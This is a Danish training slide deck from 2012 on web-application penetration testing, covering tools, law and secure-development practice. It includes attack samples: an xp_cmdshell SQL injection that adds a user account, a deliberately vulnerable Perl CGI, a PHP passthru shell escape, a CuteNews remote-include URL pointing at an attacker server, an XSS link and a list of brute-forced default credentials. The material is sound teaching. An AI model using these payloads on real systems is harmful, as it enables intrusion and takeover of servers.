Penetration testing II webbaserede angreb

Størrelse: px
Starte visningen fra side:

Download "Penetration testing II webbaserede angreb"

Transkript

1 Welcome to Penetration testing II webbaserede angreb Henrik Lund Kramshøj c copyright 2012 Solido Networks, Henrik Lund Kramshøj 1

2 OWASP Denmark arrangement Sæt kryds i kalenderen og sig det til dem du kender!! Dato: 12. marts 2012 Tidspunkt: kl dagen efter Open Source Days Oplægsholder: Jim Manico, som flyver til København for at tale med os. Title: Web Application Access Control Design Excellence Abstract: Access Control is a necessary security control at almost every layer within a web application. This talk will discuss several of the key access control anti-patterns commonly found during website security audits. These access control anti-patterns include hard-coded security policies, lack of horizontal access control, and fail open access control mechanisms. In reviewing these and other access control problems, we will discuss and design a positive access control mechanism that is data contextual, activity based, configurable, flexible, and deny-by-default - among other positive design attributes that make up a robust web-based access-control mechanism. Lokaler: Bjarne har skaffet lokale hos Deloitte, Weidekampsgade 6, 2300 København S. c copyright 2012 Solido Networks, Henrik Lund Kramshøj 2

3 Formålet idag Don t Panic! Introducere basale penetrationstestmetoder mod webservere og web applikationer Gøre deltagerne istand til at udforske området ved at henvise til gode kilder c copyright 2012 Solido Networks, Henrik Lund Kramshøj 3

4 Planen idag Kl Mindre foredrag mere snak Mindre enetale, mere foredrag 2.0 med socialt medie, informationsdeling og interaktion c copyright 2012 Solido Networks, Henrik Lund Kramshøj 4

5 Hacker - cracker Det korte svar - drop diskussionen Det havde oprindeligt en anden betydning, men medierne har taget udtrykket til sig - og idag har det begge betydninger. Idag er en hacker stadig en der bryder ind i systemer! ref. Spafford, Cheswick, Garfinkel, Stoll,... - alle kendte navne indenfor sikkerhed Hvis man vil vide mere kan man starte med: Cuckoo s Egg: Tracking a Spy Through the Maze of Computer Espionage, Clifford Stoll Hackers: Heroes of the Computer Revolution, Steven Levy Practical Unix and Internet Security, Simson Garfinkel, Gene Spafford, Alan Schwartz c copyright 2012 Solido Networks, Henrik Lund Kramshøj 5

6 Definition af hacking, oprindeligt Eric Raymond, der vedligeholder en ordbog over computer-slang (The Jargon File) har blandt andet følgende forklaringer på ordet hacker: En person, der nyder at undersøge detaljer i programmerbare systemer og hvordan man udvider deres anvendelsesmuligheder i modsætning til de fleste brugere, der bare lærer det mest nødvendige En som programmerer lidenskabligt (eller enddog fanatisk) eller en der foretrækker at programmere fremfor at teoretiserer om det En ekspert i et bestemt program eller en der ofter arbejder med eller på det; som i en Unixhacker. Kilde: Peter Makholm, Benyttes stadig i visse sammenhænge se c copyright 2012 Solido Networks, Henrik Lund Kramshøj 6

7 Aftale om test af netværk Straffelovens paragraf 263 Stk. 2. Med bøde eller fængsel indtil 1 år og 6 måneder straffes den, der uberettiget skaffer sig adgang til en andens oplysninger eller programmer, der er bestemt til at bruges i et informationssystem. Hacking kan betyde: At man skal betale erstatning til personer eller virksomheder At man får konfiskeret sit udstyr af politiet At man, hvis man er over 15 år og bliver dømt for hacking, kan få en bøde - eller fængselsstraf i alvorlige tilfælde At man, hvis man er over 15 år og bliver dømt for hacking, får en plettet straffeattest. Det kan give problemer, hvis man skal finde et job eller hvis man skal rejse til visse lande, fx USA og Australien Frygten for terror har forstærket ovenstående - så lad være! c copyright 2012 Solido Networks, Henrik Lund Kramshøj 7

8 ISC2 code of ethics https://www.isc2.org/ethics/default.aspx c copyright 2012 Solido Networks, Henrik Lund Kramshøj 8

9 Er sikkerhedstest af webservere interessant? Sikkerhedsproblemer i netværk er mange Kan være et krav fra eksterne - eksempelvis VISA PCI krav c copyright 2012 Solido Networks, Henrik Lund Kramshøj 9

10 Emneområder Introduktion - begreber og teknologierne i webmiljøer Hvad er sikkerhedstest af webservere Planlægning af sikkerhedstest Før testen - forberedelse Konsulentens udstyr - vil du teste websites Selve testens udførelse demosystemet WebGoat Nikto, WebScarab, Paros Proxy Sikring af websystemer c copyright 2012 Solido Networks, Henrik Lund Kramshøj 10

11 Introduktion - begreber og teknologierne Sikkerhedstest / penetrationstest Afprøvning af sikkerhedsforanstaltninger og evaluering af sikkerhedsniveau ved hjælp af IT systemer og hackerværktøjer Kaldes tillige sårbarhedstest, sårbarhedsanalyse m.v. Ekstern - udføres fra internet typisk over WAN Intern, inside, on-site - udføres hos kunden typisk over LAN og bag firewall c copyright 2012 Solido Networks, Henrik Lund Kramshøj 11

12 Blackbox, greybox og whitebox Forudsætninger og forudgående kendskab til miljøet Afhængig af de informationer der er tilgængelige om opbygningen af det scannede netværk forud for NetSikkerhedsanalysen taler man om henholdsvis White, Grey og Black Box testning. Black Box testen involverer en sikkerhedstestning af et netværk uden nogen form for insider viden om systemet udover den IP-adresse, der ønskes testet. Dette svarer til den situation en fjendtlig hacker vil stå i og giver derfor det mest realistiske billede af netværkets sårbarhed overfor angreb udefra. Men er dårlig ressourceudnyttelse. I den anden ende af skalaen har vi White Box testen. I dette tilfælde har sikkerhedsspecialisten både før og under testen fuld adgang til alle informationer om det scannede netværk. Analysen vil derfor kunne afsløre sårbarheder, der ikke umiddelbart er synlige for en almindelig angriber. En White Box test er typisk mere omfattende end en Black Box test og forudsætter en højere grad af deltagelse fra kundens side, men giver en meget detaljeret og tilbundsgående undersøgelse. En Grey Box test er som navnet siger et kompromis mellem en White Box og en Black Box test. Typisk vil sikkerhedsspecialisten udover en IP-adresse være i besiddelse af de mest grundlæggende systemoplysninger: Hvilken type af server der er tale om (mail-, webserver eller andet), operativsystemet og eventuelt om der er opstillet en firewall foran serveren. c copyright 2012 Solido Networks, Henrik Lund Kramshøj 12

13 Værktøjer Alle bruger nogenlunde de samme værktøjer, måske forskellige mærker Portscanner - Fydor Nmap Generel sårbarhedsscanner - OpenVAS/Nessus Speciel web sårbarhedsscanner - eksempelvis Nikto Speciel database sårbarhedsscanner Specielle scannere - wifi Aircrack-ng, m.fl.... Rapportværktøj - manuel eller automatisk, helst så automatiseret som muligt Meget ofte er sikkerhedstest automatiseret på de indledende skridt og manuel derefter og scripting, powershell, unix shell, perl, python, ruby,... c copyright 2012 Solido Networks, Henrik Lund Kramshøj 13

14 Konsulentens udstyr - vil du være sikkerhedskonsulent Bøger: Metasploit The Penetration Tester s Guide by David Kennedy, Jim O Gorman, Devon Kearns, and Mati Aharoni Gray Hat Hacking: The Ethical Hacker s Handbook, 3rd Edition, Shon Harris et al, Osborne Counter Hack Reloaded: A Step-by-Step Guide to Computer Attacks and Effective Defenses (2nd Edition), Ed Skoudis, Prentice Hall PTR Internetressourcer: BackTrack OSSTMM - Open Source Security Testing Methodology Manual CCCure website Web sites for diverse værktøjer - inkluderer ofte en step-by-step guide c copyright 2012 Solido Networks, Henrik Lund Kramshøj 14

15 Netværk Internet eller virksomheden Workshop netværk til praktiske øvelser DHCP assigned Firewall/router Soekris med OpenBSD Router mellem netværk LAN switch DMZ arbejdspladser (DHCP) Servere Windows server 2000 Server+IIS Linux server Boot af LIVE CD OpenBSD server Fiona HTTP server switch c copyright 2012 Solido Networks, Henrik Lund Kramshøj 15

16 Hackerværktøjer Der benyttes en del værktøjer: Nmap, Nping - tester porte, godt til firewall admins Metasploit Framework gratis på Wireshark avanceret netværkssniffer - Burpsuite Skipfish Apache Tomcat J2EE servlet container OpenBSD operativsystem med fokus på sikkerhed c copyright 2012 Solido Networks, Henrik Lund Kramshøj 16

17 Hvad skal der ske? Tænk som en hacker Rekognoscering ping sweep, port scan OS detection - TCP/IP eller banner grab Servicescan - rpcinfo, netbios,... telnet/netcat interaktion med services Udnyttelse/afprøvning: Nessus, nikto, exploit programs Oprydning/hærdning vises måske ikke, men I bør i praksis: Vi går idag kun efter webservere c copyright 2012 Solido Networks, Henrik Lund Kramshøj 17

18 Internet idag Server Client Internet Klienter og servere Rødder i akademiske miljøer Protokoller der er op til 20 år gamle Meget lidt kryptering, mest på http til brug ved e-handel c copyright 2012 Solido Networks, Henrik Lund Kramshøj 18

19 OSI og Internet modellerne OSI Reference Model Internet protocol suite Application Presentation Session Transport Applications HTTP, SMTP, FTP,SNMP, TCP UDP NFS XDR RPC Network IPv4 IPv6 ICMPv6 ICMP Link ARP RARP MAC Physical Ethernet token-ring ATM... c copyright 2012 Solido Networks, Henrik Lund Kramshøj 19

20 Informationsindsamling Indsamling af informationer kan være aktiv eller passiv indsamling i forhold til målet for angrebet passiv kunne være at lytte med på trafik eller søge i databaser på Internet: google, whois, archive.org m.fl. aktiv indsamling er eksempelvis at sende ICMP pakker og registrere hvad man får af svar, portscan m.v. c copyright 2012 Solido Networks, Henrik Lund Kramshøj 20

21 whois systemet IP adresserne administreres i dagligdagen af et antal Internet registries, hvor de største er: RIPE (Réseaux IP Européens) ARIN American Registry for Internet Numbers Asia Pacific Network Information Center LACNIC (Regional Latin-American and Caribbean IP Address Registry) - Latin America and some Caribbean Islands AfriNIC African Internet Numbers Registry disse fem kaldes for Regional Internet Registries (RIRs) i modsætning til Local Internet Registries (LIRs) og National Internet Registry (NIR) Firefox add-on galore, brug dem - AS nummer, IP, whois, country c copyright 2012 Solido Networks, Henrik Lund Kramshøj 21

22 nmap port sweep efter port 80/TCP Port 80 TCP er webservere # nmap -p /28 Starting nmap V ( ) Interesting ports on router.kramse.dk ( ): Port State Service 80/tcp filtered http Interesting ports on ( ): Port State Service 80/tcp open http Interesting ports on ( ): Port State Service 80/tcp open http c copyright 2012 Solido Networks, Henrik Lund Kramshøj 22

23 OS detection # nmap -O ip.adresse.slet.tet scan af en gateway Starting nmap 3.48 ( ) at :31 CET Interesting ports on gw-int.security6.net (ip.adresse.slet.tet): (The 1653 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1080/tcp open socks 5000/tcp open UPnP Device type: general purpose Running: FreeBSD 4.X OS details: FreeBSD 4.8-STABLE Uptime days (since Wed Nov 12 07:14: ) Nmap run completed -- 1 IP address (1 host up) scanned in seconds lavniveau måde at identificere operativsystemer på, prøv også nmap -A send pakker med anderledes indhold Reference: ICMP Usage In Scanning Version 3.0, Ofir Arkin c copyright 2012 Solido Networks, Henrik Lund Kramshøj 23

24 brute force Hydra v2.5 (c) 2003 by van Hauser / THC Syntax: hydra [[[-l LOGIN -L FILE] [-p PASS -P FILE]] [-C FILE]] [-o FILE] [-t TASKS] [-g TASKS] [-T SERVERS] [-M FILE] [-w TIME] [-f] [-e ns] [-s PORT] [-S] [-vv] server service [OPT] Options: -S connect via SSL -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -e ns additional checks, "n" for null password, "s" try login as pass -C FILE colon seperated "login:pass" format, instead of -L/-P option -M FILE file containing server list (parallizes attacks, see -T) -o FILE write found login/password pairs to FILE instead of stdout... hvad betyder bruteforcing? c copyright 2012 Solido Networks, Henrik Lund Kramshøj 24

25 bruteforge Why another one? Words are generated in a bruteforce fashion but, when a condition takes place, it skips forward to the next valid word! User can define charset, maximum number of uses for every char in charset, patterns/repetitions to exclude. User can trim down number of combinations generated excluding invalid words by setting some criteria. Hvordan laver man rigtigt bruteforce? Skal man teste ALT - A, AA, AAA, AAAA, AAAAA, AAAAAAAAA c copyright 2012 Solido Networks, Henrik Lund Kramshøj 25

26 Real life bruteforce? Found in Jan 2012 root:admin:87.x admin:admin:91.x admin: :x admin: :89.xx admin: :89.x root:root:186.x admin:admin:189.x root:dumn3z3u:189.x admin: :189.x root:admin:169.x root:default:66.x root:default:66.x root:111111:213.x admin:admin:91.x admin: :195.x admin: :195.x c copyright 2012 Solido Networks, Henrik Lund Kramshøj 26

27 Undgå standard indstillinger når vi scanner efter services går det nemt med at finde dem Giv jer selv mere tid til at omkonfigurere og opdatere ved at undgå standardindstillinger Tiden der går fra en sårbarhed annonceres på bugtraq til den bliver udnyttet er meget kort idag! Ved at undgå standard indstillinger kan der måske opnås en lidt længere frist - inden ormene kommer NB: ingen garanti - og det hjælper sjældent mod en dedikeret angriber c copyright 2012 Solido Networks, Henrik Lund Kramshøj 27

28 buffer overflows et C problem Et buffer overflow er det der sker når man skriver flere data end der er afsat plads til i en buffer, et dataområde. Typisk vil programmet gå ned, men i visse tilfælde kan en angriber overskrive returadresser for funktionskald og overtage kontrollen. Stack protection er et udtryk for de systemer der ved hjælp af operativsystemer, programbiblioteker og lign. beskytter stakken med returadresser og andre variable mod overskrivning gennem buffer overflows. StackGuard og Propolice er nogle af de mest kendte. c copyright 2012 Solido Networks, Henrik Lund Kramshøj 28

29 Webserver buffer overflows exploit/exploitprogram er udnytter eller demonstrerer en sårbarhed rettet mod et specifikt system. kan være 5 linier eller flere sider Meget ofte Perl eller et C program c copyright 2012 Solido Networks, Henrik Lund Kramshøj 29

30 Privilegier least privilege Hvorfor afvikle applikationer med administrationsrettigheder - hvis der kun skal læses fra eksempelvis en database? least privilege betyder at man afvikler kode med det mest restriktive sæt af privileger - kun lige nok til at opgaven kan udføres Dette praktiseres ikke i webløsninger i Danmark - eller meget få steder c copyright 2012 Solido Networks, Henrik Lund Kramshøj 30

31 Privilegier privilege escalation privilege escalation er når man på en eller anden vis opnår højere privileger på et system, eksempelvis som følge af fejl i programmer der afvikles med højere privilegier. Derfor HTTPD servere på UNIX afvikles som nobody - ingen specielle rettigheder. En angriber der kan afvikle vilkårlige kommandoer kan ofte finde en sårbarhed som kan udnyttes lokalt - få rettigheder = lille skade c copyright 2012 Solido Networks, Henrik Lund Kramshøj 31

32 local vs. remote exploits local vs. remote angiver om et exploit er rettet mod en sårbarhed lokalt på maskinen, eksempelvis opnå højere privilegier, eller beregnet til at udnytter sårbarheder over netværk remote root exploit - den type man frygter mest, idet det er et exploit program der når det afvikles giver angriberen fuld kontrol, root user er administrator på UNIX, over netværket. zero-day exploits dem som ikke offentliggøres - dem som hackere holder for sig selv. Dag 0 henviser til at ingen kender til dem før de offentliggøres og ofte er der umiddelbart ingen rettelser til de sårbarheder c copyright 2012 Solido Networks, Henrik Lund Kramshøj 32

33 Selve webserveren Operativsystemet skal hærdes - Før systemet er åbent fra internet! Webserveren skal installeres uden for meget funktionalitet Microsoft Windows - brug Windows 2003 som server med IIS version 6.0 Denne version har mindre funktionalitet end 5.0 og indbyggede sikkerhedsværktøjer UNIX brug apache version 2.0 grenen, evt. 2.2 efter behov Apache HTTPD server 2.0 og frem er nemmere at konfigurere c copyright 2012 Solido Networks, Henrik Lund Kramshøj 33

34 Apache Tomcat Null Byte sårbarhed BID 6721 Apache Tomcat Null Byte Directory/File Disclosure Vulnerability CAN c copyright 2012 Solido Networks, Henrik Lund Kramshøj 34

35 Apache Tomcat sårbarhed - sårbar Sårbar version af Tomcat kører på serveren c copyright 2012 Solido Networks, Henrik Lund Kramshøj 35

36 Apache Tomcat sårbarhed - opdateret Tomcat efter opgradering er serveren ikke sårbar mere c copyright 2012 Solido Networks, Henrik Lund Kramshøj 36

37 Nikto webscanner Description Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/cgis, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). Nem at starte, checker en hel del - og kan selvfølgelig udvides nikto -host port 8080 c copyright 2012 Solido Networks, Henrik Lund Kramshøj 37

38 Vi afprøver nu følgende programmer sammen: Nikto web server scanner c copyright 2012 Solido Networks, Henrik Lund Kramshøj 38

39 Demo: Nikto Script started on Tue Nov 7 17:43: $ nikto -host port 8080 ˆM Nikto 1.35/ Target IP: Target Hostname: localhost.pentest.dk + Target Port: Start Time: Tue Nov 7 17:43: /examples/ - Directory indexing enabled, also default JSP examples. (GET) + /examples/jsp/snp/snoop.jsp - Displays information about page retrievals, including other users. (GET) + /examples/servlets/index.html - Apache Tomcat default JSP pages present. (GET)... Demo nikto - burde finde nogle ting, men finder dog ikke vores Null Byte Falske positiv vs falske negativ! c copyright 2012 Solido Networks, Henrik Lund Kramshøj 39

40 W3af W3af Web Application Attack and Audit Framework net/ Begge findes på BackTrack c copyright 2012 Solido Networks, Henrik Lund Kramshøj 40

41 Skipfish Vi afprøver nu følgende program sammen: Skipfish fully automated, active web application security reconnaissance tool. Af Michal Zalewski c copyright 2012 Solido Networks, Henrik Lund Kramshøj 41

42 Sårbare programmer Hvorfor er programmerne stadig sårbare? RFP exploits - adgang til kommandolinien via database?:\program Files\Common Files\System\Msadc\msadcs.dll Unicode - fejl i håndtering af specialtilfælde double decode - flere fejl i håndtering af nye specialtilfælde Dark spyrit jill.c - Internet Printing Protocol IPP. Ny funktionalitet som implementeres med fejl Programmer idag er komplekse! c copyright 2012 Solido Networks, Henrik Lund Kramshøj 42

43 The Exploit Database - dagens buffer overflow c copyright 2012 Solido Networks, Henrik Lund Kramshøj 43

44 Kodekvaliteten NU snakker vi kode... og høj kvalitet er mere sikker. Hudson Extensible continuous integration server Sonar Yasca can scan source code written in Java, C/C++, HTML, JavaScript, ASP, ColdFusion, PHP, COBOL,.NET, and other languages. Yasca can integrate easily with other tools Automatisk analyse af software html NB: du skal stadig tænke dig om :-) c copyright 2012 Solido Networks, Henrik Lund Kramshøj 44

45 konfigurationsfejl - ofte overset Forkert brug af programmer er ofte overset opfyldes forudsætningerne er programmet egnet til dette miljø er man udannet/erfaren i dette produkt Kunne I finde på at kopiere cmd.exe til /scripts kataloget på en IIS? Det har jeg engang været ude for at en kunde havde gjort! hvis I under test af en server opdager at denne har /scripts/cmd1.exe eller FTP-scripts til at hente værktøjer... så er den pågældende server formentlig kompromitteret c copyright 2012 Solido Networks, Henrik Lund Kramshøj 45

46 Insecure programming Problem: Ønsker et simpelt CGI program, en web udgave af finger Formål: Vise oplysningerne om brugere på systemet c copyright 2012 Solido Networks, Henrik Lund Kramshøj 46

47 review af nogle muligheder ASP SQL server scripting, meget generelt - man kan alt databasesprog - meget kraftfuldt mange databasesystemer giver mulighed for specifik tildeling af privilegier grant JAVA generelt programmeringssprog bytecode verifikation indbygget sandbox funktionalitet Perl og andre generelle programmeringssprog Pas på shell escapes!!! c copyright 2012 Solido Networks, Henrik Lund Kramshøj 47

48 Hello world of insecure web CGI Demo af et sårbart system - badfinger Løsning: Kalde finger kommandoen et Perl script afvikles som CGI standard Apache HTTPD 1.3 server c copyright 2012 Solido Networks, Henrik Lund Kramshøj 48

49 De vitale - og usikre dele print "Content-type: text/html\n\n<html>"; print "<body bgcolor=# leftmargin=20 topmargin=20"; print "marginwidth=20 marginheight=20>"; print <<XX; <h1>bad finger command!</h1> <HR COLOR=#000> <form method="post" action="bad_finger.cgi"> Enter userid: <input type="text" size="40" name="command"> </form> <HR COLOR=#000> XX if(&readform(*input)){ print "<pre>\n"; print "will execute:\n/usr/bin/finger $input{ command }\n"; print "<HR COLOR=#000>\n"; print /usr/bin/finger $input{ command } ; print "<pre>\n"; } c copyright 2012 Solido Networks, Henrik Lund Kramshøj 49

50 Dumheder Diverse småproblemer, som.inc.bak og hidden fields samt: Diskussion - APG konkurrencen Konkurrence på Antipiratgruppens hjemmeside Svar på nogle spørgsmål og vind! I HTML kildeteksten stod denne reference til form_results.txt U-File="../_private/form_results.txt" S-Format="TEXT/CSV" og da filen med denne lå på adressen finder man c copyright 2012 Solido Networks, Henrik Lund Kramshøj 50

51 SQL injection SQL Injection FAQ Set myrecordset = myconnection.execute ("SELECT * FROM mytable WHERE sometext = " & request.form("inputdata") & " ") med input: exec master..xp_cmdshell net user test testpass /ADD -- modtager og udfører serveren: SELECT * FROM mytable WHERE sometext = exec master..xp_cmdshell net user test testpass /ADD -- er kommentar i SQL c copyright 2012 Solido Networks, Henrik Lund Kramshøj 51

52 Er SQL injection almindeligt? Ja, meget almindeligt! Prøv at søge med google The Database Hacker s Handbook : Defending Database Servers David Litchfield, Chris Anley, John Heasman, Bill Grindlay, Wiley 2005 ISBN: c copyright 2012 Solido Networks, Henrik Lund Kramshøj 52

53 Sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Features Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems. Full support for five SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query and stacked queries. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name. Support to enumerate database users, users password hashes, users privileges, users roles, databases, tables and columns. Automatic recognition of password hashes format and support to crack them with a dictionary-based attack. c copyright 2012 Solido Networks, Henrik Lund Kramshøj 53

54 JAVA programmering Hvorfor ikke bare bruge JAVA? JAVA karakteristik automatisk garbage collection bytecode verifikation på mulighed for signeret kode beskyldes for at være langsomt platformsuafhængigt JAVA just in Time (JIT) er sammenligneligt med kompileret C god sikkerhedsmodel - men problemer i implementationerne JVM - den virtuelle maskine er dog skrevet i C og udsat for angreb c copyright 2012 Solido Networks, Henrik Lund Kramshøj 54

55 ASP og.net Jeg er ikke ekspert - men bliv aligevel OWASP top 10 listerne er platformsuafhængige! c copyright 2012 Solido Networks, Henrik Lund Kramshøj 55

56 CuteNews Lille nemt nyhedssystem Mit demosystem virker ikke mere, fordi installationen er blevet for sikker c copyright 2012 Solido Networks, Henrik Lund Kramshøj 56

57 CuteNews Soekris med OpenBSD Apache http server med onde PHP scripts Internet Apache med PHP og CuteNews CuteNews indeholder sårbarheder Sårbarheden er beskrevet på: Softwaren findes på: c copyright 2012 Solido Networks, Henrik Lund Kramshøj 57

58 CuteNews - normal virkemåde Apache webserver PHP fortolker CuteNews PHP script nyheder Internet Apache med PHP og CuteNews c copyright 2012 Solido Networks, Henrik Lund Kramshøj 58

59 CuteNews - CutePath PHP injection Apache webserver PHP fortolker PHP script CuteNews PHP script nyheder Soekris med OpenBSD Apache http server med onde PHP scripts Internet Apache med PHP og CuteNews cutepath=http://ondserver/files/pentest/ c copyright 2012 Solido Networks, Henrik Lund Kramshøj 59

60 CuteNews - detaljer Henter config.php i cutepath - søgesti Cutepath kan ændres og derved kan filen data/config.php hentes fra en vilkårlig server på Internet Webserveren henter filen - ud gennem firewall PHP fortolkeren på webserveren udfører kommandoerne NB: ikke kun problem for PHP c copyright 2012 Solido Networks, Henrik Lund Kramshøj 60

61 PHP shell escapes Hvad indeholder hackerens udgave af filen data/config.php - alt, bagdøre, hack scripts, exploits <pre> <?php passthru(" netstat -an && ifconfig -a");?> </pre> Andre shell escapes: Perl: print /usr/bin/finger $input{ command } ; UNIX shell: echo hej Microsoft SQL: exec master..xp_cmdshell net user test testpass /ADD resultat: webserveren sender data ud via normal HTTP c copyright 2012 Solido Networks, Henrik Lund Kramshøj 61

62 CuteNews opsummering Hvad opdager man ved demoen at man skal validere alle input man skal passe på shell escapes Pas på små programmer du lægger på et website Pas på STORE programmer du lægger på et website Man kan altså ikke stole på brugeren! c copyright 2012 Solido Networks, Henrik Lund Kramshøj 62

63 Almindelige problemer validering af forms Validering på klient er godt - godt for brugervenligheden, hurtigt feedback validering på clientside gør intet for sikkerheden serverside validering er nødvendigt generelt er input validering det største problem! c copyright 2012 Solido Networks, Henrik Lund Kramshøj 63

64 Hvordan udnyttes forms nemmest? Download form: <FORM ACTION="opret.asp?mode=bruger?id=doopret" METHOD="POST" NAME="opret" ONSUBMIT="return validate(this)"> fjern kald til validering: <FORM ACTION="opret.asp?mode=bruger?id=doopret" METHOD="POST" NAME="opret"> Tilføj BASE HREF i header, findes med browser - højreklik properties i Internet Explorer c copyright 2012 Solido Networks, Henrik Lund Kramshøj 64

65 Hvordan udnyttes forms nemmest? Den form som man bruger er så - fra sin lokale harddisk: <HEAD> <TITLE>Our Products</TITLE> <BASE href="http://www.target.server/sti/til/form"> </HEAD>... <FORM ACTION="opret.asp?mode=bruger?id=doopret" METHOD="POST" NAME="opret"> Kald form i en browser og indtast værdier Det anbefales istedet for den manuelle process at bruge WebScarab, Parox Proxy eller Tamper Data add-on til Firefox c copyright 2012 Solido Networks, Henrik Lund Kramshøj 65

66 Cross-site scripting Hvis der inkluderes brugerinput I websider som vises, kan der måske indføjes ekstra information/kode. Hvis et CGI program, eksempelvis comment.cgi blot bruger værdien af mycomment vil følgende URL give anledning til cross-site scripting <A HREF="http://example.com/comment.cgi? mycomment=<script>malicious code</script> ">Click here</a> Hvis der henvises til kode kan det endda give anledning til afvikling i anden security context Kilde/inspiration: c copyright 2012 Solido Networks, Henrik Lund Kramshøj 66

67 Historik indenfor websikkerhed IIS track record meget funktionalitet større risiko for fejl alvorlige fejl - arbitrary code execution Apache track record typisk mindre funktionalitet typisk haft mindre alvorlige fejl PHP track record Sammenligning IIS med Apache+PHP, idet en direkte sammenligning mellem IIS og Apache vil være unfair Meget få har idag små websteder med statisk indhold c copyright 2012 Solido Networks, Henrik Lund Kramshøj 67

68 Opsummering websikkerhed Husk hidden fields er ikke mere skjulte end view source -knappen i browseren serverside validering er nødvendigt SQL injection er nemt at udføre og almindeligt Cross-site scripting kan have uanede muligheder c copyright 2012 Solido Networks, Henrik Lund Kramshøj 68

69 Paros proxy Paros - for web application security assessment We wrote a program called Paros for people who need to evaluate the security of their web applications. It is free of charge and completely written in Java. Through Paros s proxy nature, all HTTP and HTTPS data between server and client, including cookies and form fields, can be intercepted and modified. JAVA framework til udvikling af værktøjer til HTTP og HTTPS undersøgelse c copyright 2012 Solido Networks, Henrik Lund Kramshøj 69

70 webscarab JAVA framework til udvikling af værktøjer til HTTP og HTTPS undersøgelse Svarer nogenlunde til Paros Proxy, men inkluderer fuzzing og session id undersøgelse https://www.owasp.org/index.php/category:owasp_webscarab_project c copyright 2012 Solido Networks, Henrik Lund Kramshøj 70

71 webscarab spider c copyright 2012 Solido Networks, Henrik Lund Kramshøj 71

72 Burpsuite Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application s attack surface, through to finding and exploiting security vulnerabilities. Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. Burp suite indeholder både proxy, spider, scanner og andre værktøjer i samme pakke - NB: EUR 225 per user per year. c copyright 2012 Solido Networks, Henrik Lund Kramshøj 72

73 Mere Web application hacking The Web Application Hacker s Handbook: Discovering and Exploiting Security Flaws Dafydd Stuttard, Marcus Pinto, Wiley 2007 ISBN: c copyright 2012 Solido Networks, Henrik Lund Kramshøj 73

74 Tamper Data https://addons.mozilla.org/en-us/firefox/addon/tamper-data/ c copyright 2012 Solido Networks, Henrik Lund Kramshøj 74

75 Hvad er en firewall En firewall er noget som blokerer traffik på Internet En firewall er noget som tillader traffik på Internet Myte: en firewall beskytter mod alt c copyright 2012 Solido Networks, Henrik Lund Kramshøj 75

76 Myten om firewalls Myten: en firewall beskytter mod alt Sandhed: en firewall blokerer en masse, fint nok en firewall tillader at du henter en masse ind Beskytter mod direkte angreb fra netværket Beskytter ikke mod fysiske angreb Beskytter ikke mod malware gennem websider og Firewall anbefales altid, specielt på bærbare c copyright 2012 Solido Networks, Henrik Lund Kramshøj 76

77 OWASP top ten The OWASP Top Ten provides a minimum standard for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. The Open Web Application Security Project (OWASP) OWASP har gennem flere år udgivet en liste over de 10 vigtigste sikkerhedsproblemer for webapplikationer c copyright 2012 Solido Networks, Henrik Lund Kramshøj 77

78 Web applikationer Glem ikke OWASP, der findes efterhånden vejledninger til alle sprog, eksempelvis: Ruby On Rails Security Guide men hvad med XML web services? c copyright 2012 Solido Networks, Henrik Lund Kramshøj 78

79 OWASP WebGoat WebGoat fra OWASP, Træningsmiljø til webhacking Downloades som Zipfil og kan afvikles direkte på en Windows laptop https://www.owasp.org c copyright 2012 Solido Networks, Henrik Lund Kramshøj 79

80 Udviklingsstandarder Hvad gør I for at undgå problemer som de her nævnte? - kan man gøre mere? Man børe være klar over hvilke teknologier man bruger Standardiser på et mindre antal produkter, biblioteker, sprog Regler og procedurer skal hele tiden opdateres: Kvalitetssikring guidelines for tilladte tags guidelines for brug af SQL Ved at fokusere på antallet af produkter kan man måske indskrænke mulighederne for fejl, høj kvalitet er ofte mere sikkert nye produkter kan være farlige til man lærer dem at kende! c copyright 2012 Solido Networks, Henrik Lund Kramshøj 80

81 Retningslinier Hvis der ikke findes retningslinier for udvikling så etabler disse eksempel: javascript må gerne benyttes til at validere forms for at give hurtig feedback til brugeren serveren der modtager input fra brugeren validerer alle data sikkerhedsmæssigt Retningslinierne er medvirkende til at foretage en afbalanceret investering i sikkerheden undgå dyre hovsa løsninger undgå huller i sikkerheden, ens niveau c copyright 2012 Solido Networks, Henrik Lund Kramshøj 81

82 Change management Er der tilstrækkeligt med fokus på software i produktion Kan en vilkårlig server nemt reetableres Foretages rettelser direkte på produktionssystemer Er der fall-back plan Burde være god systemadministrator praksis c copyright 2012 Solido Networks, Henrik Lund Kramshøj 82

83 Algoritmer - kryptografi hvorfor det ikke er nok at bruge en XOR til at sikre kodeord? Eksempel: IBM Net.Commerce/WebSphere Der blev fundet en sårbarhed, og ret hurtigt kom et værktøj der automatiserede SUQ.DIQ version 1.00 by xor37h and darkman of SMERSH Danish Design Description: A Win32 application, developed in assembly, for encrypting and decrypting passwords from IBM Net.Commerce, WebSphere and possibly other IBM and Lotus applications aswell. STOR RISIKO FOR FEJL - brug hashalgoritme MD5 eller SHA med salt c copyright 2012 Solido Networks, Henrik Lund Kramshøj 83

84 SSL The S in HTTPS stands for secure and the security is provided by SSL/TLS. SSL/TLS is a standard network protocol which is implemented in every browser and web server to provide confidentiality and integrity for HTTPS traffic. Nu vi snakker om kryptering - SSL overalt? Kan vi klare det på vores servere? Google kan: Men alt for få gør det c copyright 2012 Solido Networks, Henrik Lund Kramshøj 84

